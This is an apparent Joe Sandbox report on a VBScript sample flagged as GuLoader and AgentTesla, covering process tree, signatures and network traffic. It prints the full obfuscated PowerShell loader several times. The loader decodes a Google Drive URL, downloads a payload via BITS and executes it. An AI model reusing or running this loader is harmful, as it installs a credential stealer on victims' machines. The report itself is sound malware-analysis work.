Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Tagdk.vbs

Overview

General Information

Sample Name:Tagdk.vbs
Analysis ID:1332433
MD5:c99faf86e65b24343ffaebe5801ea155
SHA1:b03430d210b299e6108861b9f1f87bd6716cfeaa
SHA256:7af3bca67a5ae075acf74bdc961e596575a2f19f5e13907b25066ff6f5929ae8
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
VBScript performs obfuscated calls to suspicious functions
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6648 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Tagdk.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 604 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & ($Skotskterr01) (Propje9 'AracIPyrim MicpAedioIntrrhellt Opr- ToaM SkyoAflvdMugwu GarlPuckeFitt DigtB TapiBekltSprnsFrysTUgleranveaMonon Nons Ellfelece Avlr Skk ') ;$Ratioeravi2=$Ratioeravi2+'\blyantss.Ned';while (-not $Badehusesv) { .($Skotskterr01) (Propje9 'Helo$CleaBSiksaSigtdSlouetrikhDespuDogtsSgepeRorisSerovVand=Pssi(TrouTdemoeKortsTrant Teg-FjerPRetua RectDuleh fer Opfr$UnvaRMicraovert BeviSerioVille SqurVashaSerrvHeteiPalm2Nonl)Indi ') ; . ($Skotskterr01) $Skotskterr00; . ($Skotskterr01) (Propje9 'micrS WootOutgaHepar LibtBela-GtzsS BunlAdkoeOpdrePythpSolv Brod5Ecth ');} & ($Skotskterr01) (Propje9 'Unde$stemPLevorEpopoOvnhpBanajKegleLege Rrte= The KidlGPoneeSuprtAdmi- skaCFresoResenGudetTeodeBorsn Tavt Tyk Miap$CardRCursahydrt LociNanzoUndeeDeakrTegnaInvevsampi Dev2 Pat '); . ($Skotskterr01) (Propje9 'Vkke$ReceBDrvloMiddlNedtdPicksOblipOccliPrel Sint=Dair Lim[ AugSVipsy UndsBasitbaggeSpenmSkrm.VidoCDustoTamtn SkjvIlsaeForprPebbt Slu] Nor:Cata:AdmiFLambr SudoGaramaftaBAmataRendsSkoceSmel6anel4SibeSForntMonorAquaiWharnMiddgSikk(Iken$GldsPExosrRopeoKvlspMultjBerteunim)Tros '); & ($Skotskterr01) (Propje9 'Hngs$AxedSParakSpiloUnintKrydsMillkPukrtaquoe TabrTurarImpl2Puck Vrim=tran Smit[DiscSSekuyVamps InitSkuleMegam Sku.KidnT Oble deix OdotOrty.AntiESwagnvexecFaktoGrifdMartiNonhn undgAnti]Brug:Vels:ElleA epiSEvodCAgraISuppIUnna.AndrGDoweeJudatOlieSHypot OborNonaiStyrn AergSpil( Fly$ForsB BlooFamilExpedCharsUndepAraciBago)Cyke '); .($Skotskterr01) (Propje9 'Hist$MandAZigzmStyroTdrarTypo=Four$ OveS Merkbicoo SvetGunssRadbk ColtLavteIschrDobbrForh2Adva.Encysplejuspukb KomsDeuttIronrunifiUnwinMonogForz(Mons2 Cre5Raad6Taal3Repa1Anve1Cata,Utru2Lign8Spal4 Voy3Lysi0Synd)Bobs '); & ($Skotskterr01) $Amor;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6876 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; & ($Skotskterr01) (Propje9 'AracIPyrim MicpAedioIntrrhellt Opr- ToaM SkyoAflvdMugwu GarlPuckeFitt DigtB TapiBekltSprnsFrysTUgleranveaMonon Nons Ellfelece Avlr Skk ') ;$Ratioeravi2=$Ratioeravi2+'\blyantss.Ned';while (-not $Badehusesv) { .($Skotskterr01) (Propje9 'Helo$CleaBSiksaSigtdSlouetrikhDespuDogtsSgepeRorisSerovVand=Pssi(TrouTdemoeKortsTrant Teg-FjerPRetua RectDuleh fer Opfr$UnvaRMicraovert BeviSerioVille SqurVashaSerrvHeteiPalm2Nonl)Indi ') ; . ($Skotskterr01) $Skotskterr00; . ($Skotskterr01) (Propje9 'micrS WootOutgaHepar LibtBela-GtzsS BunlAdkoeOpdrePythpSolv Brod5Ecth ');} & ($Skotskterr01) (Propje9 'Unde$stemPLevorEpopoOvnhpBanajKegleLege Rrte= The KidlGPoneeSuprtAdmi- skaCFresoResenGudetTeodeBorsn Tavt Tyk Miap$CardRCursahydrt LociNanzoUndeeDeakrTegnaInvevsampi Dev2 Pat '); . ($Skotskterr01) (Propje9 'Vkke$ReceBDrvloMiddlNedtdPicksOblipOccliPrel Sint=Dair Lim[ AugSVipsy UndsBasitbaggeSpenmSkrm.VidoCDustoTamtn SkjvIlsaeForprPebbt Slu] Nor:Cata:AdmiFLambr SudoGaramaftaBAmataRendsSkoceSmel6anel4SibeSForntMonorAquaiWharnMiddgSikk(Iken$GldsPExosrRopeoKvlspMultjBerteunim)Tros '); & ($Skotskterr01) (Propje9 'Hngs$AxedSParakSpiloUnintKrydsMillkPukrtaquoe TabrTurarImpl2Puck Vrim=tran Smit[DiscSSekuyVamps InitSkuleMegam Sku.KidnT Oble deix OdotOrty.AntiESwagnvexecFaktoGrifdMartiNonhn undgAnti]Brug:Vels:ElleA epiSEvodCAgraISuppIUnna.AndrGDoweeJudatOlieSHypot OborNonaiStyrn AergSpil( Fly$ForsB BlooFamilExpedCharsUndepAraciBago)Cyke '); .($Skotskterr01) (Propje9 'Hist$MandAZigzmStyroTdrarTypo=Four$ OveS Merkbicoo SvetGunssRadbk ColtLavteIschrDobbrForh2Adva.Encysplejuspukb KomsDeuttIronrunifiUnwinMonogForz(Mons2 Cre5Raad6Taal3Repa1Anve1Cata,Utru2Lign8Spal4 Voy3Lysi0Synd)Bobs '); & ($Skotskterr01) $Amor;} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • CasPol.exe (PID: 5388 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1956924821.0000000008B90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000009.00000002.2774546567.00000000204E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.2774546567.00000000204E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.1945999546.0000000005E71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000004.00000002.1957028121.000000000B3A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: unknownHTTPS traffic detected: 142.251.167.100:443 -> 192.168.2.11:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.167.100:443 -> 192.168.2.11:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.253.115.132:443 -> 192.168.2.11:49724 version: TLS 1.2
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ki4j11guteiebf6blo04mvkvk2tr7322/1698303750000/11453474870507226654/*/1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR?e=download&uuid=6a8fff3a-2af7-46da-ad3f-190aba55b412 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-04-8c-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.2.11:49725 -> 142.44.240.172:587
            Source: global trafficTCP traffic: 192.168.2.11:49725 -> 142.44.240.172:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: powershell.exe, 00000002.00000002.2133508862.0000019B901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2042681481.0000019B81BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2133508862.0000019B9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1941873102.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2042681481.0000019B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1941873102.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.1941873102.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2150800220.0000019BE9E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: powershell.exe, 00000002.00000002.2042681481.0000019B80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1941873102.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000004.00000002.1941873102.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0
            Source: powershell.exe, 00000002.00000002.2042681481.0000019B80231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0p
            Source: powershell.exe, 00000004.00000002.1941873102.0000000004D17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2042681481.0000019B812CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2133508862.0000019B901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2042681481.0000019B81BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2133508862.0000019B9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1945999546.0000000005C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 25 Oct 2023 11:58:21 GMTUser-Agent: Microsoft BITS/7.8Host: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 25 Oct 2023 11:58:21 GMTUser-Agent: Microsoft BITS/7.8Host: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ki4j11guteiebf6blo04mvkvk2tr7322/1698303750000/11453474870507226654/*/1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR?e=download&uuid=6a8fff3a-2af7-46da-ad3f-190aba55b412 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-04-8c-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.251.167.100:443 -> 192.168.2.11:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.167.100:443 -> 192.168.2.11:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.253.115.132:443 -> 192.168.2.11:49724 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Process Memory Space: powershell.exe PID: 6876, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " function Propje9 ([String]$Hjsp){$Avancereno=5;For($Genne=4; $Genne -lt $Hjsp.Length-1; $Genne+=$Avancereno){$Mdeaftner=$Hjsp.Substring( $Genne, 1);$Skotskterr+=$Mdeaftner};$Skotskterr;}$Abonnemen=Propje9 'AntehEnsit BegtMonopBucksTryn:Admi/ For/IndudNonurRekiiAfstvLcsyeSubo.lattgSmitoDigeoDiscgDatalHarpe fug. CoccIssuoEpicmPoly/ intutowecLong?diureTranx TyppPampointer PhitFutu=SymfdKasboBerawBundnWarll EntoCommaNonsdGtes&JuniiOmnidGrns=Unfr1UdvadBenzsSamm7FremuskrnXLoosoSpdbiDemoivargNCuspl FsfQElecLMathUEfteVcullaRufiO Hal6ForskKirigfrer1squa9StifnAlimcNumifBagff Rhiq Refe Gge2 Resg FlaoUncamKore0Giga ';$Skotskterr01=Propje9 'Prini SpyeUnquxSurp ';$Homem163 = Propje9 'Atte\Makrs Apiy OvesPrepwagreoAuthwKitt6Forb4Nond\NonbWRushiWaganUnded Svio SauwDrags CacPDepuoPrydwForfeLignrGrsgSSocihErotefisklPastlMemo\KnstvDete1Famo. Bal0 Tim\Backpdatio pegw Seme BikrRheasLobehBanke Skalsolal Sna.BenzeGavsxGrapeCarn ';. ($Skotskterr01) (Propje9 'Bran$SymfRMusiaVoldtCigaiParto MooeMakur UdvaFearvPolai Gra2Supe=Inte$Lavre GngnSippv Gad:Coppw Afsi GednDyredHegliIngerUdet ') ; . ($Skotskterr01) (Propje9 'Bort$ FabHOveroIdeam MoneGummmrung1 Tre6Merp3Apop=mold$GaelRApopaGrantLovriIdyloEkvieAalerSupra BeavSupeiTamp2Cadd+Godt$SemoHBurso CysmMulteAktemMess1 For6Zine3Gobb ') ; . ($Skotskterr01) (Propje9 'Hage$MonoHRedaeFeritAeroeAnterSadeoClampCand Rede=Bour Komm(Dame(TolegPrsiw Flnm ScaiPrin Multw EksiHeatnTeat3Cloi2Narr_SkylpAnatrQuaroCompcDanieFuglsMordsNonv Rei-AuktFTsem PrecPDruirfyrsoSpydcCryoePaabsIcons GloI IdrdOuts=Mist$Tyra{KhouPTranIStilDSjak}Phal)form. OxiCRomao KlimGesvm Nona TronSelvdWedlL UnciWintnDybkeGulc) Nar Ker-insesFidup Hvil Radi QuatLaqu Unnu[Sukkc ModhLafgaSpoorEndu]Flyv3Klav4Deat '); & ($Skotskterr01) (Propje9 'Deaf$ DrmSUnada colmNatsm fese ThanFisc Kol=Ence Tids$MongHViateCoevtRedeeDatar SkroCentp Sys[cons$DigtH Pine NevtSuppeStjerJocaoprimp Unc.AliecAntio TypufirenAndetSkar- Vet2Beas]Wond '); & ($Skotskterr01) (Propje9 ' Alk$meloD Mina SubtUnedaSkva= Far(OverTGlyceGrensBudgt Pre-UnpePChimaPaattCraihEnhe Wan$vaerHHaanoDestmDiatePetnmNske1Fase6Trac3Mech) Enc Unop-LavkAMarknNoncd Ant Unpu(Kiss[ AfpIBactnPunktNbetPStiltHelprBear]Bank:Unin: DklsPartiEmpizMuree Sun Ele-runeeSkryq Fly Rive8 Ver)Bava ') ;if ($Data) {.$Homem163 $Sammen;} else {;$Skotskterr00=Propje9 'RuskSCarbtStilaStaarCoddtAkti-PitiBskatiDalgtRisosCaprTTyngroracaElfen VinsLawnfKlkeeKalirMali Ang- CatS TwioRecouFiltrovalcRenmeGoos Cerv$DeclAArtib Speo ClenSystnHallePancm Yace VognUnse Laes- LarD Fame BetsJavat TmriLkkenDagcaKinitAnveiFolioDundnstad Repu$ DisR Sena StatAarsiArtfoSteneVincrPrecaHejev HomiMeli2Have '; .($Skotskterr01) (Propje9 'Sang$tranRMewlaOxydtReceiSagsoHushe Pror Jeka ColvhvisiRapp2Afgr=Stri$HarzeDobbnUdvivposi:SkanaLnpapPyelpElvrdKammaSergtCatdaHyri ') ; &
